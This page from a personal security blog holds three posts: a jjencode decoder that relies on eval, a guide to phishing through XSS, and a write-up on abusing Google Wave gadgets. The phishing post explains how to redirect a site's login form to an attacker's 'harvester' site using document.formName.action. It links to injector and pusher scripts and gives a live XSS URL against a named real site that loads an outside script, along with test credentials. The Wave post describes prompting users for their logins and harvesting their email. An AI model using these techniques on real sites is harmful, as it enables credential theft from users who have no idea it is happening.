Jul
28

jjencode decoder (jjdecode)

So I’ve had a look at jjencode some time ago and today I decided to do a decoder for the bloody thing. Instead of creating an entire parser for JS I decided to trust the code a bit by evaling the code prior to the encoded part and thereby letting the browsers JS engine build up the scope for me to use afterwards.

If you have no clue what jjencode is then you can read this: http://pferrie2.tripod.com/papers/jjencode.pdf and this: http://utf-8.jp/public/20090710/jjencode.pps. And you can try it here: http://utf-8.jp/public/jjencode.html. Basicly it encoded your code into symbols only. alert(0) would be be encoded into this (with parameter g set to “_”):

 1: _=~[];
 2: _={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};
 3: _.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;
 4: _.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;
 5: _.$=(_.___)[_.$_][_.$_];
 6: _.$(_.$(_.$$+"\""+_.$_$_+(![]+"")[_._$_]+_.$$$_+"\\"+_.__$+_.$$_+_._$_+_.__+"("+_.___+")"+"\"")())();

I’m aware that could lead to some code execution in the decoding part but if that code is incoded it needs the full scope inorder to eval it. All non-encoded code I would be able to filter of by myself. A code which could trigger a code execution at accident at this time would be:

 1: _=~[];
 2: alert(0);
 3: _={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};
 4: _.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;
 5: _.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;
 6: _.$=(_.___)[_.$_][_.$_];
 7: _.$(_.$(_.$$+"\""+_.$_$_+(![]+"")[_._$_]+_.$$$_+"\\"+_.__$+_.$$_+_._$_+_.__+"("+_.___+")"+"\"")())();

The alert(0) in the second line would be fired off, but then again. It’s quite easy to spot in this example. If I get some more time, I’ll go the long was in decoding this the proper way.

In the decoder I start by finding the variable name of the main object (in the encoder that’s the paramter g) hereafter I start splitting the encoded code up at all semi-colons (;) with a RegEx. Here’s the two RegExs, first the one for parameter g and then the one for splitting up the lines (text is my input of encoded code).

 1: var g = text.match(/([^=])=~\[\];/)[1];
 2: var lines = text.match(/([^;]*);/g);

With g and the lines in hand I do a loop on the lines checking for the execution part of jjencode. If it’s not found I’ll eval the line, otherwise I’ll set the variable lookAhead to true and thereby concatinating the rest of the encoded lines before pulling out the encoded code out of the execution part and running eval on the thing for it to return it’s content. More explaning comes later on. Here’s the if from the loop, I’ll just run it through.

 1: if ( ! lines[i].match(/_.\$\(_.\$\(/) && ! lookAhead) {
 2:     eval(lines[i]);
 3: } else {
 4:     lookAhead = true;
 5:     finalLine = finalLine + lines[i];
 6:
 7:     if (i == lines.length - 1) {
 8:         // _.\$\((.*)(\)\(\))
 9:         var re = new RegExp(g + '.\\$\\((.*)(\\)\\(\\))');
 10:         var reString = finalLine.match(re);
 11:         output = eval(reString[1]);
 12:     }
 13: }

Line 1 if of course the check whether the execution part of jjencode is to be found in the line. If not I’ll eval the code at line 2. Inside the else I’ll start the lookAhead since the execution part was found, I’ll concat the line to the finalLine variable. When there is no more lines to concat it will trigger the if sentence at line 7. The RegEx at line 9 vill take the return code inside the execution part and take it out to eval it and return lastly.

You can try the thing here: http://e-x-e.dk/labs/jjdecode/index.php, go have some fun and let me know if you do something smiliar. Remeber to have your console open when fooling around with this. The decoder function can be found here: http://e-x-e.dk/labs/jjdecode/assets/decoder.js and the encoder here: http://e-x-e.dk/labs/jjdecode/assets/encoder.js (the encoder is from http://utf-8.jp/public/jjencode.html).

Jul
03

How to phish the effective and smart way using XSS

Normally if you wish to phish a user for information like passwords, emails, social security numbers, credit card numbers or what not and you’re exploiting some website with a bug in its handling of user content (either from a database or from the GET data) (Please note that POST XSS exploits isn’t really easy to exploit since you’ll have to make the user POST the data him/herself) you normally would like to send the user to your own phishing page where you have copied the compromised sites design, CSS etc. 

Please note that when phishing by exploiting an unprotected frame which gets its content URL from a GET querystring (RFI) you’ll have to either copy the CSS etc to your own site or simply link to the sites own CSS files.

Moving on to the topic of this post, exploiting XSS vulnerabilities to phish the attacked users, of course without the users having a clue.

One of the methods which I don’t see get exploited is the JavaScript call “document.formName.action=’http://your-harvester-site.com/exploitingAction.php’”.

With the code above it’s possible to create a man-in-the-middle kind of attack where you can either just choose to log the information of the form or you can choose to tamper with the information before posting the data to the original action.

It can be done with this 3 step attack:

1. step: Inject the forms of a XSS exploitable page, e.g. with a script like this: http://www.e-x-e.dk/labs/autoPhisher/injector.js. A super simple yet effective script I’ll be using for this PoC.

2. step: Receive the form data, log it/tamper it and send the victim back to the original site with a new exploited URL injected with a “pusher”. This script could be done like this:

http://www.e-x-e.dk/labs/autoPhisher/source/index.php

This script is using a subclass of the abstract class TopLoader I’m using, it just has some basic functions for getting, setting, saving, deleting etc.

The last part of the script is computing a new pusher-injected URL to which the victim will be sent.

3. step: Let the pusher to its job

Since we cannot do a POST call for the victim to the original action serverside through PHP, we’ll have to make the browser do it for us through JavaScript.

The pusher script generates some JavaScript which is started when the is window.onload(). It tries to set the value of the form elements from the original form submit by the victim with getElementById. If the element is not found by this method it’ll try to set the value via the getElementsByName. Last but not least it auto submits the correct form with document.forms[{form ID}].submit(). The generator script is here:

http://www.e-x-e.dk/labs/autoPhisher/source/pusher.php

Here a place you can test this thing out:

http://www.doid.dk/page/main.asp?error=timeout&referer=%22%3E%3Cscript%20src=http://www.e-x-e.dk/labs/autoPhisher/injector.js%3E%3C/script%3E

Example user / password: testerLars / testerLars

Let me know what you think by making some comments and maybe leaving some more usage examples.

Jan
16

Hacking Google Wave (XSS, XSSR)

The last couple of days I’ve been fooling around with Google Wave and it’s so called “Gadgets”. In relation to this I  couldn’t help trying out some simple XSS and XSSR techniques which I’ll now show you and hopefully the Google Wave developers so they can secure the Gadgets – creating a even better product. These gadget tests was made in the Google Wave preview and not in the Sandbox because I’m still waiting for being granted access to the Sandbox. When I acquire access to the Sandbox I’ll follow up on this blogpost. Lets get started with the fun shall we? :)

So  I started with stealing a basic example, cleaned it down, leaving only the raw gadget. From there I used the “gadgets.util.registerOnLoadHandler(init);” functionality to load potentially malicious code onLoad of the Gadget. This can be used to prompt the viewer of the Gadget for eg. login information. The normal trusting user wouldn’t suspect this risk since it was prompted by Google Wave, right? ;)

Passing on I’ve created a couple of buttons in the Gadget which called a couple of Javascript function which did a couple of different things, one simple alerted the user, just to show that you could do anything.

One button changed window.top.location, sending the user to a completely other site, away from the “protecting” environment of Google Wave.

One button got the viewers Google Wave ID (an email), his/hers display name and his/hers thumbnail url. This could maybe be used to created fake accounts on websites, compromising the viewers exclusive use of his/hers email. Of course the email could also be harvested and sold to spamming bad guys with a lot of “Great deals on Viagra”. ;)

The last button I created in this little Gadget example did also change the window.top.location but this time not to an url but instead to some data:text/html – base64 encoded. This could be used to show ads or propaganda to the viewer without a possibility to block a specific url, since this was content defined in the Gadget’s code itself.

This is what I’ve been doing the last day or two :) I have you read this and spread the word and of course leave a comment or a trackback. As said I’ll be back with more Google Wave security when I get access to the Sandbox :)

My Gadget can be viewed and tested at this URL:

http://e-x-e.dk/labs/waveHack/hack1.xml

Or you can just watch the screenshots:
Vis Google Wave hack

Go back to top